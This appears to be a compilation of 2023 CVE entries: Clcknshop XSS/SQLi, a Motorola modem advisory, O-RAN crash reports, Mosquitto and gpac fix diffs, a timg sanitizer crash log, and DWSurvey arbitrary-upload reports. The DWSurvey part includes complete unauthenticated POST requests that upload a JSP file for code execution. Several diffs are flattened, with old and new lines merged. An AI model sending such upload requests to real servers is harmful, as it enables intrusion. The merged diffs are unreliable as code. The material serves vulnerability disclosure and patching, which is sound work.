A vulnerability was found in Infosoftbd Clcknshop 1.0.0. It has been declared as problematic. This vulnerability affects unknown code of the file /collection/all. The manipulation of the argument q leads to cross site scripting. The attack can be initiated remotely. VDB-238570 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.

CVE-2023-4707

A vulnerability was found in Infosoftbd Clcknshop 1.0.0. It has been rated as critical. This issue affects some unknown processing of the file /collection/all of the component GET Parameter Handler. The manipulation of the argument tag leads to sql injection. The attack may be initiated remotely. The associated identifier of this vulnerability is VDB-238571. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.

CVE-2023-4708

I some cases, when the device is USB-tethered to a host PC, and the device is sharing its mobile network connection with the host PC, if the user originates a call on the device, then the device's modem may reset and cause the phone call to not succeed.  This may block the user from dialing emergency services.  This patch resolves the device's modem reset issue.

  

Motorola Security Advisory: MML-2022-45675  

  
Potential Impact: Denial-of-Service

  
Severity:

CVSS 3.1 Base Score

4.9

CVSS 3.1 Temporal Score

4.6

CVSS 3.1 Vector

CVSS:3.1/AV:P/AC:L/PR:L/UI:R/S:C/C:N/I:N/A:H

  
CVE Identifier: CVE-2022-3407

Summary Description: 

  
In some cases, when the device is USB-tethered to a host PC and connected to the mobile network, and the user originates a call on the device, then the device’s modem may reset and cause the phone call to not succeed.  This may block the user from dialing emergency services.

  
Mitigation Strategy for Customers (what you should do to protect yourself):  
 

*   Update your product to a software version with an SPL of 2022-11-01 or later.  (Your phone should automatically alert you when a new security update is available, but you can also immediately check for updates under Settings...System Updates.)  
     
*   Untether the device from the host PC before making a phone call, particularly if dialing emergency services.  
     
*   Do not allow an untrusted person physical access to your device

 Product Impact:

Motorola smartphones  
 

**Was this answer helpful?**

CVE-2022-3407: Improper Resource Shutdown vulnerability in some Motorola smartphones allows denial-of-service of network services, including emergency services

An issue in O-RAN Software Community E2 G-Release allows attackers to cause a Denial of Service (DoS) by incorrectly initiating the messaging procedure between the E2Node and E2Term components.

Dear O-RAN Software Community

I'd like to report the crash related to E2Term.

Following the correct E2AP setup procedure, E2node must first send an _E2setupRequest_ to E2Term to request the establishment of a connection.

However, if E2node does not send the message according to the correct procedure, it can lead to E2Term crashing.

For example, if E2Node sends _RIC\_indication_ or _E2serviceUpdate_ right from the start without sending _E2setupRequest_ beforehand, E2Term will crash upon receiving these messages.

In other words, if the first message sent is _E2setupRequest_, then sending _RIC\_indication_ or _E2serviceUpdate_ afterward will not result in a crash.

After testing, it was found that sending _RICindications_, _RICsubscriptionRequests_, _E2service Updates_, and _E2NodeConfiguration_ updates all lead to crashes.

**Impact:**

The attacker can trigger incorrect message flows leading to E2term crashes by sending this type of packet to E2Term through E2node.

**PoC:**

The attachment includes two crash result diagrams and the packet that caused the crash. We can easily trigger the crash by sending this packet through port 36422 of E2Term.

CVE-2023-41628: [RIC-1002] Abnormal signaling process cause E2Term crash

O-RAN Software Community ric-plt-lib-rmr v4.9.0 does not validate the source of the routing tables it receives, potentially allowing attackers to send forged routing tables to the device.

Dear O-RAN Software Community

I'd like to report an issue with the RMR service not verifying the messages it receives.

We know that components using the rmr library(RMR service) rely on the routing manager to regularly send a routing table, so they can communicate with other components inside the RIC system.

However, the RMR service does not verify the source of the received routing table information, and the transmission of these routing tables is unencrypted, which means we can send forged routing tables to deceive the target service.

**Impact:**

This lack of validation allows an attacker to exploit this weakness by sending forged routing table information to any RMR service.

For example, attackers could use xApp to send forged routing tables to other RMR services and mess up communication between different components.

**PoC:**

In the attachment, I have provided an example of a route table packet that can be used to interrupt communication between various components.

You can simply change the component's message routing settings by sending it through xApp to the target component, such as e2term.

CVE-2023-41627: [RIC-1001] RMR service doesn't verify the route tables it receives

The broker in Eclipse Mosquitto 1.3.2 through 2.x before 2.0.16 has a memory leak that can be abused remotely when a client sends many QoS 2 messages with duplicate message IDs, and fails to respond to PUBREC commands. This occurs because of mishandling of EAGAIN from the libc send function.

Expand Up @@ -42,6 +42,7 @@ int handle\_\_publish(struct mosquitto \*context) uint8\_t header \= context\->in\_packet.command; int res \= 0; struct mosquitto\_msg\_store \*msg, \*stored \= NULL; struct mosquitto\_client\_msg \*cmsg\_stored \= NULL; size\_t len; uint16\_t slen; char \*topic\_mount; Expand Down Expand Up @@ -287,24 +288,24 @@ int handle\_\_publish(struct mosquitto \*context) }  
if(msg\->qos \> 0){ db\_\_message\_store\_find(context, msg\->source\_mid, &stored); db\_\_message\_store\_find(context, msg\->source\_mid, &cmsg\_stored); }  
if(stored && msg\->source\_mid != 0 && (stored\->qos != msg\->qos || stored\->payloadlen != msg\->payloadlen || strcmp(stored\->topic, msg\->topic) || memcmp(stored\->payload, msg\->payload, msg\->payloadlen) )){ if(cmsg\_stored && cmsg\_stored\->store && msg\->source\_mid != 0 && (cmsg\_stored\->store\->qos != msg\->qos || cmsg\_stored\->store\->payloadlen != msg\->payloadlen || strcmp(cmsg\_stored\->store\->topic, msg\->topic) || memcmp(cmsg\_stored\->store\->payload, msg\->payload, msg\->payloadlen) )){  
log\_\_printf(NULL, MOSQ\_LOG\_WARNING, "Reused message ID %u from %s detected. Clearing from storage.", msg\->source\_mid, context\->id); db\_\_message\_remove\_incoming(context, msg\->source\_mid); stored \= NULL; cmsg\_stored \= NULL; }  
if(!stored){ if(!cmsg\_stored){ if(msg\->qos \== 0 || db\_\_ready\_for\_flight(context, mosq\_md\_in, msg\->qos) || db\_\_ready\_for\_queue(context, msg\->qos, &context\->msgs\_in)){ ){  
dup \= 0; rc \= db\_\_message\_store(context, msg, message\_expiry\_interval, 0, mosq\_mo\_client); Expand All @@ -316,10 +317,13 @@ int handle\_\_publish(struct mosquitto \*context) } stored \= msg; msg \= NULL; dup \= 0; }else{ db\_\_msg\_store\_free(msg); msg \= NULL; dup \= 1; stored \= cmsg\_stored\->store; cmsg\_stored\->dup++; dup \= cmsg\_stored\->dup; }  
switch(stored\->qos){ Expand All @@ -345,11 +349,17 @@ int handle\_\_publish(struct mosquitto \*context) }else{ res \= 0; }  
/\* db\_\_message\_insert() returns 2 to indicate dropped message \* due to queue. This isn't an error so don't disconnect them. \*/ /\* FIXME - this is no longer necessary due to failing early above \*/ if(!res){ if(send\_\_pubrec(context, stored\->source\_mid, 0, NULL)) rc \= 1; if(dup \== 0 || dup \== 1){ rc2 \= send\_\_pubrec(context, stored\->source\_mid, 0, NULL); if(rc2) rc \= rc2; }else{ return MOSQ\_ERR\_PROTOCOL; } }else if(res \== 1){ rc \= 1; } Expand All @@ -374,6 +384,9 @@ int handle\_\_publish(struct mosquitto \*context) } db\_\_msg\_store\_free(msg); } if(context\->out\_packet\_count >= db.config\->max\_queued\_messages){ rc \= MQTT\_RC\_QUOTA\_EXCEEDED; } return rc; }

CVE-2023-28366: Fix for CVE-2023-28366 · eclipse/mosquitto@6113eac

Buffer Overflow vulnerability in hzeller timg v.1.5.2 and before allows a remote attacker to cause a denial of service via the 0x61200000045c address.

**I use afl++ fuzzing this program**

    export CC=/usr/bin/clang
    export CXX=/usr/bin/clang++
    cmake -B build && cmake --build build
    ➜  src ./timg --version
    timg 1.5.1+  <https://timg.sh/>
    Copyright (c) 2016..2023 Henner Zeller. This program is free software; license GPL 2.0.
    
    Image decoding GraphicsMagick 1.3.38 (2022-03-26)
    Turbo JPEG
    QOI Image reader
    STB image loading fallback
    Video decoding libav 58.76.100
    Half, quarter, iterm2, and kitty encoding timg builtin.
    Libsixel version 1.8.6
    

then build afl++ run this poc

    =================================================================
    ==2368346==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61200000045c at pc 0x00000051d18e bp 0x7fff288903e0 sp 0x7fff288903d8
    WRITE of size 4 at 0x61200000045c thread T0
        #0 0x51d18d in void timg::StoreBacking<2>(timg::rgba_t*, timg::rgba_t const*, timg::rgba_t const*) /home/xxx/timg-1.5.1/src/unicode-block-canvas.cc:145:20
        #1 0x51d18d in char* timg::UnicodeBlockCanvas::AppendDoubleRow<2, 24>(char*, int, int, timg::rgba_t const*, timg::rgba_t const*, bool, int*) /home/xxx/timg-1.5.1/src/unicode-block-canvas.cc:305:9
        #2 0x518011 in timg::UnicodeBlockCanvas::Send(int, int, timg::Framebuffer const&, timg::SeqType, timg::Duration) /home/xxx/timg-1.5.1/src/unicode-block-canvas.cc:374:23
        #3 0x5126c6 in timg::(anonymous namespace)::SingleColumnRenderer::render_cb(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&)::'lambda'(int, int, timg::Framebuffer const&, timg::SeqType, timg::Duration const&)::operator()(int, int, timg::Framebuffer const&, timg::SeqType, timg::Duration const&) const /home/xxx/timg-1.5.1/src/renderer.cc:50:22
        #4 0x5126c6 in void std::__invoke_impl<void, timg::(anonymous namespace)::SingleColumnRenderer::render_cb(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&)::'lambda'(int, int, timg::Framebuffer const&, timg::SeqType, timg::Duration const&)&, int, int, timg::Framebuffer const&, timg::SeqType, timg::Duration>(std::__invoke_other, timg::(anonymous namespace)::SingleColumnRenderer::render_cb(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&)::'lambda'(int, int, timg::Framebuffer const&, timg::SeqType, timg::Duration const&)&, int&&, int&&, timg::Framebuffer const&, timg::SeqType&&, timg::Duration&&) /usr/lib/gcc/x86_64-linux-gnu/11/../../../../include/c++/11/bits/invoke.h:61:14
        #5 0x5126c6 in std::enable_if<__and_<std::is_void<void>, std::__is_invocable<timg::(anonymous namespace)::SingleColumnRenderer::render_cb(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&)::'lambda'(int, int, timg::Framebuffer const&, timg::SeqType, timg::Duration const&)&, int, int, timg::Framebuffer const&, timg::SeqType, timg::Duration> >::value, void>::type std::__invoke_r<void, timg::(anonymous namespace)::SingleColumnRenderer::render_cb(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&)::'lambda'(int, int, timg::Framebuffer const&, timg::SeqType, timg::Duration const&)&, int, int, timg::Framebuffer const&, timg::SeqType, timg::Duration>(timg::(anonymous namespace)::SingleColumnRenderer::render_cb(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&)::'lambda'(int, int, timg::Framebuffer const&, timg::SeqType, timg::Duration const&)&, int&&, int&&, timg::Framebuffer const&, timg::SeqType&&, timg::Duration&&) /usr/lib/gcc/x86_64-linux-gnu/11/../../../../include/c++/11/bits/invoke.h:154:7
        #6 0x5126c6 in std::_Function_handler<void (int, int, timg::Framebuffer const&, timg::SeqType, timg::Duration), timg::(anonymous namespace)::SingleColumnRenderer::render_cb(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&)::'lambda'(int, int, timg::Framebuffer const&, timg::SeqType, timg::Duration const&)>::_M_invoke(std::_Any_data const&, int&&, int&&, timg::Framebuffer const&, timg::SeqType&&, timg::Duration&&) /usr/lib/gcc/x86_64-linux-gnu/11/../../../../include/c++/11/bits/std_function.h:290:9
        #7 0x5730d7 in std::function<void (int, int, timg::Framebuffer const&, timg::SeqType, timg::Duration)>::operator()(int, int, timg::Framebuffer const&, timg::SeqType, timg::Duration) const /usr/lib/gcc/x86_64-linux-gnu/11/../../../../include/c++/11/bits/std_function.h:590:9
        #8 0x5730d7 in timg::STBImageSource::SendFrames(timg::Duration const&, int, int const volatile&, std::function<void (int, int, timg::Framebuffer const&, timg::SeqType, timg::Duration)> const&) /home/xxx/timg-1.5.1/src/stb-image-source.cc:163:13
        #9 0x4e10eb in PresentImages(std::vector<std::future<timg::ImageSource*>, std::allocator<std::future<timg::ImageSource*> > >*, timg::DisplayOptions const&, timg::PresentationOptions const&, timg::BufferedWriteSequencer*, bool*) /home/xxx/timg-1.5.1/src/timg.cc:373:17
        #10 0x4e10eb in main /home/xxx/timg-1.5.1/src/timg.cc:960:5
        #11 0x7fa43c829d8f in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16
        #12 0x7fa43c829e3f in __libc_start_main csu/../csu/libc-start.c:392:3
        #13 0x426ee4 in _start (/home/xxx/timg-1.5.1/afl/src/timg+0x426ee4)
    
    0x61200000045c is located 0 bytes to the right of 284-byte region [0x612000000340,0x61200000045c)
    allocated by thread T0 here:
        #0 0x4a40c3 in __interceptor_realloc (/home/xxx/timg-1.5.1/afl/src/timg+0x4a40c3)
        #1 0x5179a8 in timg::UnicodeBlockCanvas::RequestBuffers(int, int) /home/xxx/timg-1.5.1/src/unicode-block-canvas.cc:424:42
        #2 0x5179a8 in timg::UnicodeBlockCanvas::Send(int, int, timg::Framebuffer const&, timg::SeqType, timg::Duration) /home/xxx/timg-1.5.1/src/unicode-block-canvas.cc:322:26
        #3 0x5126c6 in timg::(anonymous namespace)::SingleColumnRenderer::render_cb(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&)::'lambda'(int, int, timg::Framebuffer const&, timg::SeqType, timg::Duration const&)::operator()(int, int, timg::Framebuffer const&, timg::SeqType, timg::Duration const&) const /home/xxx/timg-1.5.1/src/renderer.cc:50:22
        #4 0x5126c6 in void std::__invoke_impl<void, timg::(anonymous namespace)::SingleColumnRenderer::render_cb(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&)::'lambda'(int, int, timg::Framebuffer const&, timg::SeqType, timg::Duration const&)&, int, int, timg::Framebuffer const&, timg::SeqType, timg::Duration>(std::__invoke_other, timg::(anonymous namespace)::SingleColumnRenderer::render_cb(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&)::'lambda'(int, int, timg::Framebuffer const&, timg::SeqType, timg::Duration const&)&, int&&, int&&, timg::Framebuffer const&, timg::SeqType&&, timg::Duration&&) /usr/lib/gcc/x86_64-linux-gnu/11/../../../../include/c++/11/bits/invoke.h:61:14
        #5 0x5126c6 in std::enable_if<__and_<std::is_void<void>, std::__is_invocable<timg::(anonymous namespace)::SingleColumnRenderer::render_cb(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&)::'lambda'(int, int, timg::Framebuffer const&, timg::SeqType, timg::Duration const&)&, int, int, timg::Framebuffer const&, timg::SeqType, timg::Duration> >::value, void>::type std::__invoke_r<void, timg::(anonymous namespace)::SingleColumnRenderer::render_cb(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&)::'lambda'(int, int, timg::Framebuffer const&, timg::SeqType, timg::Duration const&)&, int, int, timg::Framebuffer const&, timg::SeqType, timg::Duration>(timg::(anonymous namespace)::SingleColumnRenderer::render_cb(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&)::'lambda'(int, int, timg::Framebuffer const&, timg::SeqType, timg::Duration const&)&, int&&, int&&, timg::Framebuffer const&, timg::SeqType&&, timg::Duration&&) /usr/lib/gcc/x86_64-linux-gnu/11/../../../../include/c++/11/bits/invoke.h:154:7
        #6 0x5126c6 in std::_Function_handler<void (int, int, timg::Framebuffer const&, timg::SeqType, timg::Duration), timg::(anonymous namespace)::SingleColumnRenderer::render_cb(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&)::'lambda'(int, int, timg::Framebuffer const&, timg::SeqType, timg::Duration const&)>::_M_invoke(std::_Any_data const&, int&&, int&&, timg::Framebuffer const&, timg::SeqType&&, timg::Duration&&) /usr/lib/gcc/x86_64-linux-gnu/11/../../../../include/c++/11/bits/std_function.h:290:9
        #7 0x5730d7 in std::function<void (int, int, timg::Framebuffer const&, timg::SeqType, timg::Duration)>::operator()(int, int, timg::Framebuffer const&, timg::SeqType, timg::Duration) const /usr/lib/gcc/x86_64-linux-gnu/11/../../../../include/c++/11/bits/std_function.h:590:9
        #8 0x5730d7 in timg::STBImageSource::SendFrames(timg::Duration const&, int, int const volatile&, std::function<void (int, int, timg::Framebuffer const&, timg::SeqType, timg::Duration)> const&) /home/xxx/timg-1.5.1/src/stb-image-source.cc:163:13
        #9 0x4e10eb in PresentImages(std::vector<std::future<timg::ImageSource*>, std::allocator<std::future<timg::ImageSource*> > >*, timg::DisplayOptions const&, timg::PresentationOptions const&, timg::BufferedWriteSequencer*, bool*) /home/xxx/timg-1.5.1/src/timg.cc:373:17
        #10 0x4e10eb in main /home/xxx/timg-1.5.1/src/timg.cc:960:5
        #11 0x7fa43c829d8f in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow /home/xxx/timg-1.5.1/src/unicode-block-canvas.cc:145:20 in void timg::StoreBacking<2>(timg::rgba_t*, timg::rgba_t const*, timg::rgba_t const*)
    Shadow bytes around the buggy address:
      0x0c247fff8030: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
      0x0c247fff8040: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
      0x0c247fff8050: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fa fa
      0x0c247fff8060: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
      0x0c247fff8070: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    =>0x0c247fff8080: 00 00 00 00 00 00 00 00 00 00 00[04]fa fa fa fa
      0x0c247fff8090: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c247fff80a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c247fff80b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c247fff80c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c247fff80d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
    ==2368346==ABORTING

CVE-2023-40968: Detected Crash: AddressSanitizer: heap-buffer-overflow · Issue #115 · hzeller/timg

File Upload vulnerability in DWSurvey DWSurvey-OSS v.3.2.0 and before allows a remote attacker to execute arbitrary code via the saveimage method and savveFile in the action/UploadAction.java file.

\`\`The saveimage method and saveFile in the com/key/common/base/action/UploadAction.java file can directly upload any type of file without authorization

For the saveimage method, this method can be directly called without authorization to upload any specified type of file to the /file/images/ directory, and this directory can be accessed through a browser normally, so malicious files can be uploaded for remote code execution

  
\`POST /diaowen/up/upload!saveimage.action HTTP/1.1  
Host:  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0  
Connection: close  
Content-Length: 395  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary12345abcde  
Accept-Encoding: gzip, deflate

\------WebKitFormBoundary12345abcde  
Content-Disposition: form-data; name="uploadify"; filename="1.jsp"  
Content-Type: image/jpeg

testnixxx  
\------WebKitFormBoundary12345abcde  
Content-Disposition: form-data; name="uploadifyFileName"

1.jpg  
\------WebKitFormBoundary12345abcde  
Content-Disposition: form-data; name="uploadifyContentType"

image/jpeg  
\------WebKitFormBoundary12345abcde--  
\`  
  

Similarly, for the saveFile method, this method can also be directly called without authorization to upload any specified type of file to the directory specified by basepath under the /file directory, and this directory can be accessed through the browser normally, so malicious files can be uploaded file for remote code execution

  
\`POST /diaowen/up/upload!saveFile.action HTTP/1.1  
Host:  
User-Agent: Mozilla/5.0  
Connection: close  
Content-Length: 489  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary12345abcde  
Accept-Encoding: gzip, deflate

\------WebKitFormBoundary12345abcde  
Content-Disposition: form-data; name="basepath"

files  
\------WebKitFormBoundary12345abcde  
Content-Disposition: form-data; name="uploadify"; filename="1.jsp"  
Content-Type: image/jpeg

testnixxx  
\------WebKitFormBoundary12345abcde  
Content-Disposition: form-data; name="uploadifyFileName"

1.jpg  
\------WebKitFormBoundary12345abcde  
Content-Disposition: form-data; name="uploadifyContentType"

image/jpeg  
\------WebKitFormBoundary12345abcde--  
\`

CVE-2023-40980: Arbitrary file uploads exist · Issue #107 · wkeyuan/DWSurvey

Out-of-bounds Read in GitHub repository gpac/gpac prior to 2.3-DEV.

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Search code, repositories, users, issues, pull requests...**

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

CVE-2023-4721: Fixed #2580 · gpac/gpac@3ec93d7

Integer Overflow or Wraparound in GitHub repository gpac/gpac prior to 2.3-DEV.

Expand Up

@@ -5713,7 +5713,7 @@ static GF\_Err mp4\_mux\_initialize\_movie(GF\_MP4MuxCtx \*ctx)

if (p && p\->value.lfrac.den) {

tkw\->pid\_dur \= p\->value.lfrac;

if (tkw\->pid\_dur.num<0) tkw\->pid\_dur.num \= \-tkw\->pid\_dur.num;

if (max\_dur.num \* (s64) tkw\->pid\_dur.den < (s64) max\_dur.den \* tkw\->pid\_dur.num) {

if (gf\_timestamp\_less(max\_dur.num, max\_dur.den, tkw\->pid\_dur.num, tkw\->pid\_dur.den)) {

max\_dur.num \= tkw\->pid\_dur.num;

max\_dur.den \= tkw\->pid\_dur.den;

}

Expand Down